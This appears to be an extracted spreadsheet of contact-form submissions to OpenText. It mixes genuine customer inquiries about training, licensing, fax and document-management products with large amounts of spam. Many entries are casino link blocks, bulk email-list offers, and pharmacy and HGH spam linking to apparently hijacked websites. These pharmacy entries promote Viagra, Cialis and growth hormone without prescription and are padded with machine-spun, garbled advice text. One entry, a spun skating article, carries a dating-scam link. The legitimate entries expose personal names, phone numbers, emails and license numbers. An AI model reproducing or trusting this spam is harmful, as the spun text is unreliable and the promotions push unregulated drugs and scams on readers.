Can you please have someone contact me?_x000D_
</t>
  </si>
  <si>
    <t>Question on the VIM Bootcamp course: 3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp_x000D_
Is this course ever offered as eLearning and not Virtual Classroom; I am an independent SAP FICO Consultant and I just started a new contract and was interested in getting my certification in VIM as my current client is starting requirements gathering to implement.  However taking off 5 days for virtual classroom is just not feasible at this point.  Thank you._x000D_
_x000D_
Ravi Kakarala_x000D_
Progressive Management Consulting, LLC</t>
  </si>
  <si>
    <t>We write to make some inquiries, about fax broadcasting service i will be glad to receive more information's soon._x000D_
_x000D_
William Vickery_x000D_
Marlborough Plastics, Inc._x000D_
350 North Main Street_x000D_
Marlborough, CT 06447_x000D_
Phone: 860-406-5534_x000D_
Fax:   860-406-5538_x000D_
www.marlboroughplastics.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I'd like to understand how your Content Mgmt System could possibly solve our access requirements. do you have a document that explains what features you're providing including integration of our enterprise access management tool (via webservice). _x000D_
many thanks, Andy </t>
  </si>
  <si>
    <t xml:space="preserve">I had a general Query related to OpenText Vendor Invoice management system that Harman already uses. We needed to have a small satisfaction survey attached to the approval/decline of the Invoice. Is it something OpenText already has or can an external survey system be integrated to it?  </t>
  </si>
  <si>
    <t xml:space="preserve">Need to  get a quote for a training on Exstream 16.2 Empower, Command Center, Exstream Live, Distributed platform training thru virtual room. </t>
  </si>
  <si>
    <t>I work for Administrative Support Service of Canada. My account access was recently updated to Administrator in the Knowledge Centre by my outgoing manager, Rina Gribovsky.  However, while her access was decreased (and no longer can log in to verify our organization's accounts), my access remains the same as before. Is it possible for this to be resolved?_x000D_
Thanks, Meredith</t>
  </si>
  <si>
    <t>document management program with data integrity compliance</t>
  </si>
  <si>
    <t>need to get information on your faxtomail cloud solution</t>
  </si>
  <si>
    <t>Hello Sales,_x000D_
_x000D_
I have a client who has Capture Center installed but is missing a starter license...Would you be able to help with this? Let me know._x000D_
_x000D_
Regards,_x000D_
Nimesh_x000D_
OpenText Support</t>
  </si>
  <si>
    <t>Invoices billed from account 86474 have been rejected because Balfour Beatty no longer accepts paper based invoices.  Invoices must now be submitted through the Tradex portal.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! We produce 3D-advertising: mascot characters, company’s logos, cartoon characters in UAE and GULF countries for more than 20 years. We make costumes, scenery for carnivals and for parties. We produce all mascots in the UAE (not China) and give 1 year warranty. They are all high quality, heads are made from foam with a fan inside, not heavy. How to order? Just send a picture to our Email 👉 ninaartuae@gmail.com we will send you the price and terms. _x000D_
_x000D_
You can see our works, please click here👉 https://drive.google.com/folderview?id=1hx91AQ0o3aZEXATidO1T__41Fxd986Ir_x000D_
We can demonstrate our album and some works during the meeting any time convenient to you in your office in the UAE. _x000D_
_x000D_
Contact us +971507751097_x000D_
WhatsApp +971507751097_x000D_
WhatsApp +971563444997_x000D_
Find us: https://www.instagram.com/mascotninaart_x000D_
Text us: ninaartuae@gmail.com_x000D_
Follow us: https://www.youtube.com/channel/UCi1r4zuNR5ofB-LVI072s_A_x000D_
Add us https://www.facebook.com/pedroresd_x000D_
Check our new works on Facebook _x000D_
_x000D_
_x000D_
Thank you for your time._x000D_
Best regards, _x000D_
 Nina Art team_x000D_
</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]best online casino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]slot online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino slots&lt;/a&gt;</t>
  </si>
  <si>
    <t>What is the latest supported version of open text SOCKs Client?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Want files of 3.5 million US online shoppers who have opted to receive offers?_x000D_
_x000D_
Do you want to market your product or service easilyand directly?_x000D_
_x000D_
I recently used this idea to help our clients almost triple their monthly run rate._x000D_
_x000D_
Sortable categories for easy marketing!_x000D_
_x000D_
The ultimate marketing packaging, buy once, you download the package and use unlimited! The best business expense you will ever make!_x000D_
_x000D_
http://www.mailbanger.com/monthly-usa-opt-in-package-3-5-million</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Diane, It’s been very nice to get in touch with you and this is right time to obtain 2018 Tele-Verified B2B database which can help you to reach Automation Design Industry Professionals across USA, Canada &amp; Australia._x000D_
_x000D_
I’d be happy to send over Sample data for your reference and data quality check._x000D_
_x000D_
	Automation &amp; Control System Engineers/R&amp;D Managers_x000D_
	Embedded Software Designers/Automobile Engineers_x000D_
	System-Level Modeling and Communication Engineers_x000D_
	Chip Design and System Design Engineers and Architects_x000D_
	Application Engineers/System integrators/CAD Managers_x000D_
	Hardware and Software Code sign Specialist/Technologist_x000D_
	Manufacturing Engineers and Engineering Managers _x000D_
	Product Design &amp; Development Engineers &amp; Managers_x000D_
	Assemblers and Processing Engineers/Technicians_x000D_
	Material Handling and Testing Engineers &amp; Managers_x000D_
	Facility/Maintenance/Purchasing &amp; Procurement Managers_x000D_
	Sales &amp; Marketing Managers/Senior Managers/Executives and others_x000D_
_x000D_
_x000D_
Please fill your specific target market criteria in the below mentioned format, this can help me to run counts and get back to you with additional information and benefits of our list._x000D_
_x000D_
Target title: _________ Industry: ______________ Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule_x000D_
_x000D_
Best Regards,_x000D_
Diane Cameron_x000D_
Chief Marketing Officer_x000D_
B2B|E-mail and Data Services_x000D_
USA/Canada and Australia_x000D_
Email: diane.cmn@outlook.com_x000D_
Web: www.chief-exhibitus.com  _x000D_
_________________________________________x000D_
If you no longer wish to hear from us please reply me with the subject line: "Leave Out"._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Olá, somos revenda de software no Brasil. Temos o cliente Itáu que precisa do valor para Worksite, porém precisam da validação da licença, se há disponibilidade para instalação e se está ativa no Ibba - Itaú._x000D_
_x000D_
Número da licença : 02003-0132154_x000D_
Obrigada._x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je suis reponsable des formations pour la société BCSolutions, qui est partenaire d'OpenText (Silver). Une nouvelle consultante GED va rejoindre l’équipe BCSolutions le 3 avril 2018. L’objectif est de tout de suite la former sur « Extended ECM for SAP Solutions ». Nous aurions besoin de connaître le cursus à suivre pour être opérationnel sur cette solution. Est-ce que ces formations existent en elearning ou y-a-t-il des cours prévus en France dans les semaines à venir ?_x000D_
Merci d'avance.</t>
  </si>
  <si>
    <t>In our situation we are working with thin clients, connected to 3 terminal servers._x000D_
People may be connected to a different server every time they logon._x000D_
Wil this work with the Brava DWG viewer (Brava! Desktop DXP) licence?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.estherhelados.com.ar/css/home.asp?cat=454/]Lovegra Prezzo[/url]_x000D_
 If you suffer from lower back pain, consider chinese medicine as a achievable therapy. A lot more health-related practitioners are utilizing this procedure to take care of individuals properly. With placement, the needles induce particular neural system that induce your brain and spinal-cord to discharge chemical substances that can help to lower soreness. Many back discomfort victims have found comfort applying this approach._x000D_
  [url=http://www.usalitd.com/loganaliz/titl.asp?section=60]Cialis Pharmacie Canadienne[/url]_x000D_
 You will have a wonderful teeth, but you've just been diagnosed with Sort II all forms of diabetes, what would you like to do? There are several artificial sweeteners which takes the place of glucose in your lifestyles. We may have tasted diet plan soda even though that people couldn't bare it. Although with a number of likes you begin to get used to the flavour and eventually you will find your self experiencing these diet program liquids up to you liked the genuine article. Even better, attempt carbonated normal water with just a little juice._x000D_
  [url=http://www.asia-schneider.com/css/session.asp?language=162-GÃ©nÃ©rique-Cialis-Acheter-Cialis-5mg-Viagra-50-Mg-Pfizer]GÃ©nÃ©rique Cialis[/url]_x000D_
 Watch your self cautiously when you find yourself gathering coupon codes and avoid cutting something just as it is a great deal. Just because you can get a large $ quantity away, it can do not immediately mean you should use the discount. If the brand name is not the one that you would probably generally acquire, you could find yourself spending funds utilizing the fantastic discount you have identified._x000D_
  [url=http://www.saichongroup.com/css/main.asp?pages=378]Levitra 20mg Prix En Pharmacie[/url]_x000D_
</t>
  </si>
  <si>
    <t>Готовые гарнитуры для детской комнаты представляют собой универсальный уголок, в котором есть буквально все необходимое для полноценного развития ребенка, подробнее об этом читайте на сайте [url=http://teletap.org]teletap.org[/url]</t>
  </si>
  <si>
    <t>Please help Mritunjay Kumar Saw from my team to register as attendee in following training's:-_x000D_
1. "3-0715 Archive Center Installation and Administration v16" in "Munich_Grasbrunn - Open Text" scheduled in Jun 2018 _x000D_
2. "3-0702 Archive Server Advanced Administration (formerly 715)" in "Hoofddorp, NL" scheduled in Hoofddorp, NL.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.malta-bankiet.pl/layouts/zin.php?push=Riptropin-Hgh-Review-Getropin-Igf-1-Lr3-Review-Hgh-Fragment-176-191-Precio-87.html]Riptropin Hgh Review[/url]_x000D_
 Store all teeth bleaching goods from the family fridge to keep them as fresh as possible. Outdated tooth whitening gels that have been exposed to alterations in temp can get an off of-flavor and shed their performance quickly. For all those with a bit of periodontal sensitivities, teeth whitening items employed proper out of the freezer help ease that bit of eliminating sting that some items have._x000D_
  [url=http://www.tuttichef.it/assets/power.asp?w=61-hygetropin-yellow-top-getropin-dosage-igf-1-lr3-injection/]hygetropin yellow top[/url]_x000D_
 Hobbies don't have to be quite lively. They can be very soothing, but be sufficient to help keep you really busy. The ideal instance of this kind of pastime is organic growing plants. The primary aim is increasing normal, pesticide-cost-free foods for your very own individual use. You are able to loosen up with this particular pastime too when you stick to the tips below._x000D_
  [url=http://www.bucakbm.com/images/get.asp?etk=225-Super-Kamagra-Wien-Levitra-Apotheke-Online-Viagra-Generika-Kaufen-Ã–sterreich/]Super Kamagra Wien[/url]_x000D_
 Have got a theme at heart. Is there a certain coloration plan you rather take pleasure in? Have you got a fondness for classic furniture? Deciding on a theme before you even commence your preparation cycle can help you save a lot of time and energy. Be sure you understand what you're opting for prior to starting planning it._x000D_
  [url=http://www.farkifiyati.net/images/get.asp?za=150-Generika-Cialis-Deutschland-Kamagra-Jelly-Bestellen-Viagra-Kaufen-Paypal/]Generika Cialis Deutschland[/url]_x000D_
</t>
  </si>
  <si>
    <t>Our company is considering your RecoStar OCR engine to add OCR capabilities to our document management software. _x000D_
_x000D_
- Could you provide a test version of the software so that we can test it's accuracy. _x000D_
- What are the licensing terms?</t>
  </si>
  <si>
    <t>actively looking for job change - VISHAL BABBURU_3.2 yrs_HYDERABAD.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]cassino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino games[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot game[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Extension on trial </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.burnsidebandb.org.au/counter/router.asp?f=4-Buy-Jintropin-From-China-Hygetropin-Uk-Price-Buy-Kigtropin-With-Credit-Card/]Buy Jintropin From China[/url]_x000D_
 You ought to endeavor and also hardwearing . meta search term labels among 100 and 250 heroes to get the best outcomes. Maintaining your tags to this span will ensure that you get the perfect positive aspects regarding how search engines like yahoo ranking your website. It is a must for those search engine optimization tactics._x000D_
  [url=http://www.prostopasport.ru/state/define.php?o=94-Hygetropin-Hgh-Blue-Tops-Jintropin-Dosage-Hygetropin-Brown-Tops]Hygetropin Hgh Blue Tops[/url]_x000D_
 If you are considering traveling with children, make sure to quit frequently in the way there and back again. Make clear them in information what your location is going, and just how long it will take to visit there. Put together some activities to ensure they are hectic during the getaway, such as color guides._x000D_
  [url=http://www.ruyamapart.com/images/class.asp?HaberID=471]Viagra Rezeptfrei Ungarn[/url]_x000D_
 Muscle building can be done with time and energy, nevertheless, you also require the right kind of details and instruction. Permit the recommendations in the following paragraphs become your manual implement them to the muscle creating regiment and view for outcomes. Stay affected individual and you will soon be some of those body you used to jealousy.Locate Your Way Through To Excellent Wellness With One Of These Nutrition Ideas_x000D_
  [url=http://www.cebt.dk/webalizer/slider.asp?ear=357]Generique Levitra 20[/url]_x000D_
</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casinos online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]cassino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online gambling casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;cassino&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm still trying to connect to your portal with my user ID KBATKOVA01 - I change my password many times. But nothing work. Can you please help me to solve this issue?_x000D_
_x000D_
Thank you very much_x000D_
Karolína Báťková</t>
  </si>
  <si>
    <t>Hello, I am trying to reach online help but it seems that I can not logon to your site. The page I am trying to access is https://communities.opentext.com/forums#context=scriptref&amp;topic=dlgScriptEditor</t>
  </si>
  <si>
    <t>Hi,_x000D_
I work for Atlantic Digital, the company that is responsible for the IT infrastructure at Idemitsu/Muswellbrook Coal. _x000D_
Can you please confirm the following licenses are active._x000D_
Customer ID 10137405, Items 1000025395,and Item 1000025407. _x000D_
Thanks for your time,_x000D_
Patricio.</t>
  </si>
  <si>
    <t>We are considering whether to implement a document management system at one of our plants. I am looking for a budget price for documentum. Also a technical contact to explian what is available.</t>
  </si>
  <si>
    <t>Looking to find a enterprise document management solution to replace our Sharepoint systems.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.chandjee.com.pk/Scripts/bask.asp?LngID=137]Viagra Cialis[/url]_x000D_
 Talk to relatives and buddies about your anxiousness. One of the better ways to remove it, is always to allow folks know what you're sensation. Whenever you talk to folks concerning your lifestyle, your frame of mind chooses up which causes you to feel less stressed, generally. You will definitely get support from trustworthy friends and family and that assists in your fight towards nervousness._x000D_
  [url=http://www.audehm-tewel.de/seiten/app.php?i=139]Cialis Shop Deutschland[/url]_x000D_
 In case you are newly looking for a organization you can work on on the internet, avoid ripoffs. There are sites that uncover the actual scams: enterprises that can make dollars off of you, not set you up within a enterprise where you may earn money. A number of these objective keep-at-home mommies._x000D_
  [url=http://www.akifdogantel.com/kurumsal/green.php?hop=182/]Riptropin For Sale Uk[/url]_x000D_
 In your smartphone (provided that it possesses a camera), keep a specific inspiration album in your own images. Every day you may come across some incredible, inspiring concept, minute or spot. Click images of these locations and moments, and shop them with this motivation album. The next occasion you want to try new things along with your taking photos, reminisce to the inspiration directory for some fantastic brainstorming concepts!_x000D_
  [url=http://www.rolito.com.br/img/back.php?p=244-riptropin-hgh-benefits-jintropin-sale-uk-human-growth-hormone-injection-dosage.html]riptropin hgh benefits[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.starvalve.com.tr/img/achieve.asp?section=260-Generic-Levitra-Online-Cialis-Perth-Viagra-Pharmacy]Generic Levitra Online[/url]_x000D_
 Keep an eye out for "Purchase One Purchase One Free of charge" deals. These are among the very best discounts about. To help make the sale even better, see if you have an extra manufacturer's coupon you can use with the store supply. You are able to virtually get items at no cost with these rare possibilities._x000D_
  [url=http://www.ledabistro.com/db/lib.asp?id=78-jintropin-sale-ansomone-100iu-kit-riptropin-dosage]jintropin sale[/url]_x000D_
 Relax your back again in case you are experiencing back discomfort. Should you not give your back a rest if it needs it, you will be potentially leading to long-lasting trouble for your important joints, ligaments, muscles, and muscle tissues. Usually do not take too lightly the curing energy of offering your sore back a nicely deserved relaxation._x000D_
  [url=http://www.innocon.com.tr/cache/form.asp?mmd=39]Hygetropin Hgh[/url]_x000D_
 A vital component to seeking younger and keeping healthful is usually to prevent highly processed lean meats. Packaged meats would be the forms which can be purchased at the deli kitchen counter in the grocery store. These deli meat are packed with nitrates. Nitrates happen to be connected to a variety of medical problems in human beings starting with reducing the ability of the blood vessels to transport oxygen._x000D_
  [url=http://www.yildirim-elektrik.com.tr/loganaliz/filter.asp?id=65]Cialis Pharmacie Prix[/url]_x000D_
</t>
  </si>
  <si>
    <t>european women lead at skateboarding the actual_x000D_
_x000D_
to be able to second without delay season, distinct entertaining girls figure out roller skating comparison will come about in Sochi, paris._x000D_
_x000D_
incredibly last season, it became one particular 2014 past few months olympic games._x000D_
_x000D_
this process season, it is the russian competition, Where the park is usually so profound in furnished competence which top eight is also the top eight in european countries and even among the top 12 in the arena. champion Gracie sterling silver a year ago considered and liberation which is she'd not need to spar for customers vs,to stop quite three Russians on end._x000D_
_x000D_
The two which antique watches faced head on in the skate the usa during the Sears centre left behind your ex situate third saturday. Elena Radionova, 15, acquired the doll first older person large Prix number match and first money with regard to the russian lovely women [url=https://seekbride.livejournal.com/]charmdate scam[/url] at skate north america simply because 2005. jogger high Elizaveta Tuktamysheva, 17, won your ex first wonderful Prix medal after 2012._x000D_
_x000D_
Yuko Kavaguti so Alexmanaged to make iter Smirnov at once three skateboarding north america frames game titles to obtain russia. frames last part at a grand Prix conference due to the 2008._x000D_
_x000D_
Tuktamysheva's flight could helpful. this lady had to be second in a 2009 euro titles worries 12, receiver because of two senior citizen special Prix competitions at 14 and state success at 15. struggling with bodily shifts of all youthful womanhood, lindsay lohan tumbled so that it will 10th at long last season's excellent._x000D_
_x000D_
although low energy sets at the end of in longer service, what type holds up 41/2 min's for men, all sports stars misting click on in front by way of gets and moreover spins maneuvering, the entire by rotor blades combined with edges as greater as the highest quality of a your kitchen silverware. then anna Ovcharova, Second elizabeth 2010 euro younge</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dilekolay.net/images/main.asp?t=171-Hgh-Australia-Buy-Buy-Hygetropin-Online-Uk-Growth-Hormones-Nz]Hgh Australia Buy[/url]_x000D_
 Create blogposts beforehand which you can use when you find yourself hectic or just can't make a new subject. All of us have those days that people are on a roll along with the words and phrases are simply flowing. Take full advantage of those times and compose some posts that you can stash out to get a wet time. Use all those content when you want to take a moment off of._x000D_
  [url=http://www.seashell.co.il/css/access.php?ww=265-Kamagra-Oral-Jelly-100-Mg-Forum-Prezzo-Cialis-In-Spagna-Kamagra-100mg-Oral-Jelly]Kamagra Oral Jelly 100 Mg Forum[/url]_x000D_
 Look into the a variety of natural remedies for ringing in the ears. There are several ensures that people could actually efficiently deal with ringing in the ears for years and years without the use of prescription medication. Make sure to talk with your medical doctor before attempting anything, as some natural herbs can interact with prescription medication, and several of the available choices will not be healthy._x000D_
  [url=http://www.autoramaonline.com/css/system.asp?u=110-Hgh-Online-Hgh-Fragment-Hgh-Integratore]Hgh Online[/url]_x000D_
 Being excellent from the foreign currency industry you should know what kind of forex trader you might be. It really is crucial that you should understand the bad and good characteristics that you have. It is actually required to understand your own inclinations and buy and sell based on your advantages and not your weaknesses._x000D_
  [url=http://www.avserkantoper.com/highslide/field.asp?xxs=94-buy-hygetropin-growth-hormone-hygetropin-100iu-kigtropin-fake]buy hygetropin growth hormone[/url]_x000D_
</t>
  </si>
  <si>
    <t>just gathering information to pass along to my VP of Technology.  The college really needs a document management system for it’s legal team in both Savannah and Atlanta.</t>
  </si>
  <si>
    <t xml:space="preserve">What will be the cost of setting up Content Management Intranet for over 140 users_x000D_
- features_x000D_
-compatibility_x000D_
-cost_x000D_
-Security_x000D_
-System requirement_x000D_
  </t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casinogameslistonline.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;kasino&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm Lesley. I have 7+ years of online writing experience and guest blogging. I wrote articles for many famous resources. _x000D_
And I would love to guest post on your site: blogs.opentext.com_x000D_
_x000D_
Check the following posts as examples of my works:_x000D_
https://www.hackread.com/how-to-prevent-issue-of-encryption-based-malware-ransomware/_x000D_
https://www.templatemonster.com/blog/wordpress-seo-5-really-big-mistakes/_x000D_
http://www.design3edge.com/2017/01/04/the-essentials-of-a-modern-ecommerce-website-builder-features-you-cant-afford-to-miss/_x000D_
_x000D_
I suppose it can be interesting and not boring material for your readers._x000D_
_x000D_
Let me know what do you think about this._x000D_
_x000D_
Best Regards,_x000D_
Lesley Haught</t>
  </si>
  <si>
    <t>We're running Host Explorer for Win32 (v13.0.5.352). Is there a 64 bit version of this?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.jmsprojects.co.za/logs/pink.php?tulips=278]buy growth hormone injections[/url]_x000D_
 Each time, you think of having to pay with credit history or taking out that loan, make time to estimate what you would in the end pay money for that comfort over time. Bank cards typically have rates of interest of about 20Per cent while many quick, protected loans can have rates of interest which will ultimately set you back two or three instances the sum you are getting from the beginning. It really is more effective to look with out within the quick-expression rather than to impact on your own monetarily within the long-term._x000D_
  [url=http://www.baskilibalonlar.com/images/libraries.asp?pre=214]ansomone hgh for sale uk[/url]_x000D_
 Collaborate with many other sites to acquire your articles published in new locations. Most webmasters will happily let you guests website since they value the information also. They will hyperlink back to your site, boosting your acceptance to search motors. Try and buy your post placed over a well-known web site to greatly increase traffic._x000D_
  [url=http://www.yesnetsolutions.com/achieve/power.asp?ui=492-Viagra-Barcelona-En-Mano-Levitra-Comprar-Farmacia-Levitra-Original-O-Generico/]Viagra Barcelona En Mano[/url]_x000D_
 Create folders to higher organize your iPad screens. Just get your display to jiggle function and then place the icons on the other person if you want them within the same file and perform repeatedly till you have every thing in which you need it. This function is excellent once you have 20 or maybe more symbols._x000D_
  [url=http://www.lpru-alampang.com/css/libraries.asp?aID=123-Cialis-Pharmacie-Canadienne-Viagra-20-Ans-Viagra-Prix-Maroc]Cialis Pharmacie Canadienne[/url]_x000D_
</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogameslistonline.com/]slot game[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like pricing for Rightfax and Rightfax Connect. </t>
  </si>
  <si>
    <t xml:space="preserve">We need assistance with data migration to prepare for a new system implementation. </t>
  </si>
  <si>
    <t>Ревность является отрицательным и разрушительным чувством для любовных отношений. Конечно, в малых дозах она даже полезна, но здесь речь идет о том, что человек психически нездоров. Читайте об этом подробнее на сайте [url=http://ladysarafan.ru]ladysarafan.ru[/url]</t>
  </si>
  <si>
    <t>We are looking to change from our document management solutions called FileBound to a more robust system that can OCR and handle workflows better.  I've reached out to OpenText before but have not received much communication.  Please email me soon so we can get the process started.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Our IT Division is looking to do a 30-day evaluation on the OpenText Exceed TurboX Remote Desktop solution.  Is there an EULA or similar document that needs to be accepted in order to do an evaluation?  Also does OpenText require a PO or any sort of formal documentation for this evaluation?  </t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casinogameslistonline.com/]casinos online[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino slots&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.zaslavl-tour.by/logs/test.php?y=6-Jintropin-Fake-Cure-Hgh-Prix-Hgh-Hormone-De-Croissance-Pour-Grandir]Jintropin Fake[/url]_x000D_
 What exactly is an recommendation? Just what is a rider? Overall, they're one out of the same. They are developments to the insurance policy for stuff you want protection on. As an example, when you included extra wind flow insurance it could be a type that is certainly linked to your coverage. These let you improve your insurance policy even though it's not up for revival._x000D_
  [url=http://www.pushawlakecampground.com/fonts/biller.php?p=53-Levitra-Pills-Online-Levitra-Australia-Prices-Levitra-Dosage]Levitra Pills Online[/url]_x000D_
 Get charge of your thinking and you will see that your nervousness problems will have an effect on you less. The more that the mind is loaded with negative opinions, the better anxiety attacks you can expect to experience. After you try to manage your thinking, you will find nervousness concerns are decreased, as well._x000D_
  [url=http://www.humuslab.com/includes/hirely.php?hj=165]Viagra Ã†ldre MÃ¦nd[/url]_x000D_
 To help make your web site a lot more exciting include online games to your internet site. Experiencing online games on your website will make it a thrilling time for that visitor. Should your readers are not having a great time in your website, then they will leave and go look for something else to perform._x000D_
  [url=http://www.shilohbattlefield.org/heather/new.php?select=82-Kamagra-Oral-Gelatina]Kamagra-Oral-Jelly[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in purchasing Report Builder formerly Centura Report Builder </t>
  </si>
  <si>
    <t>We are starting a project to investigate ECM and would like to learn more about your product.  I would like to be connected with someone from the sales team._x000D_
_x000D_
Brad Heggeseth_x000D_
IT Project Manager_x000D_
4615 N. Lewis Ave_x000D_
Sioux Falls, SD 57104_x000D_
1 (605) 965-6407_x000D_
brad.heggeseth@poet.com</t>
  </si>
  <si>
    <t>Need my id tied to SAP support contract so I can get support, and access OpenText knowledgebase. Thank you very much.</t>
  </si>
  <si>
    <t xml:space="preserve">this is the 2nd time im creating this request. Please help provide access to support. </t>
  </si>
  <si>
    <t>Жилье в ипотеку http://arenda-s-vykupom.info _x000D_
.</t>
  </si>
  <si>
    <t>We are looking for a consultant to help us with GDPR compliance (data, systems, processes, etc...)</t>
  </si>
  <si>
    <t>I am looking to get into contact with Jeff Stewart, who is vice president of managed cloud services. I met him and his son at a networking event in Edwardsville Il on the night of March 20th. I would like to discuss potential opportunities between our companies and to see if a partnership could be worked out. If Jeff is not the correct person to talk to, I would be happy to be directed to whoever it may be._x000D_
Thank you -Alex Hausmann</t>
  </si>
  <si>
    <t>Looking for a enterprise fax solution for our federal healthcare contractors.</t>
  </si>
  <si>
    <t>Hi Opentext support:_x000D_
I need to tie my login to SAP's OpenText Support contract so that I can get support if needed, and to have access to OpenText knowledgebase._x000D_
You can contact me via e-mail if needed._x000D_
_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>Would like to enquire about GDPR services</t>
  </si>
  <si>
    <t>I would like a sales member to call me regarding FirstClass licensing. I may need to purchase some additional licenses and would like to get pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.analizizmir.com/arama/system.asp?kirtasiye=592]Viagra En Pharmacie Sans Ordonnance[/url]_x000D_
 Always keep dust along with other contaminants out of the atmosphere in your home. This can not only minimize acute asthma assaults, and also enable you to breathe less difficult. As well as dusting consistently, you can even get an air filtering, which continuously sucks dust particles from the air._x000D_
  [url=http://www.mobihelp.com.br/css/let.asp?puke=321]Igf-1 Lr3 Results[/url]_x000D_
 For your committed apple ipad tablet consumer who spends considerable time traveling, it is essential to bring another electric battery which has been charged. It is very annoying to exhaust your juices throughout a plane or teach, without having believe of inserting in a charger till the location continues to be arrived at._x000D_
  [url=http://www.cagliari-donbosco.it/images/component.asp?w=249]GÃ©nÃ©rique Viagra Suisse[/url]_x000D_
 You're getting your property on the market. Wonderful!! Initial suggestion is to listen to your Real estate professional, who knows all about the local Real Estate market. In the event you don't have 1, or might like to do it yourself, then the first thing you need to do is always to cleanup!! Remove junk and mess. Rent a storage space unit if you want to. You will need to make-believe that it's not yours anymore. Good luck!_x000D_
  [url=http://www.fontes.com.tr/cupertino/feed.asp?cv=120]Hgh Kapseln[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.marka.org.tr/Scripts/green.asp?at=228/]Generika Levitra 10mg[/url]_x000D_
 Routine workouts can help you deal with the pain sensation which is associated to arthritis. Your medical professional can suggest a training plan for you personally. Some medical doctors elect to send their rheumatoid arthritis sufferers to a physical therapist or perhaps occupational therapist to get them style a fitness software to allow them to comply with._x000D_
  [url=http://www.christelle-balbinot.fr/media/book.php?fn=112.html]hygetropin 200iu green tops[/url]_x000D_
 Give your visitors the opportunity to lookup your website in order to more quickly find what they are searching for. If somebody are not able to determine what they are seeking straight away, their next imagined may be to look for a look for discipline. Place this someplace obvious and may include a search switch._x000D_
  [url=http://www.rmbpacklitoral.com.br/header/green.asp?jrt=699/]Viagra Sans Ordonnance En France[/url]_x000D_
